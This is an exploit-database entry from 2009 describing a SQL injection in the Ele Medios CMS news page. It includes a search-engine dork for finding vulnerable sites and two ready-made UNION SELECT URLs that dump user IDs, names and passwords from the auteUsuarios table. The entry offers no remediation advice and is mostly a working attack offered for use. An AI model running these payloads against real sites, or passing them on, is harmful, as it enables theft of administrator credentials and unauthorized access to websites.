Ele Medios CMS SQL Injection Vulnerability

2009-12-13T00:00:00
ID 1337DAY-ID-10221
Type zdt
Reporter Dr.0rYX
Modified 2009-12-13T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================
Ele Medios CMS SQL Injection Vulnerability
==========================================

***************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.elemedios.net/
[+] script   : Ele Medios CMS
[+] Download : http://www.elemedios.net/
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"noticias.php?notiId="
 
**************************************************************************/
[ Vulnerable File ]
 
http://server/noticias.php?notiId=[N.A.S.T ]
 
[ Exploit ]
 
http://server/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+from+auteUsuarios
 
http://server/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+8+from+auteUsuarios



#  0day.today [2018-03-19]  #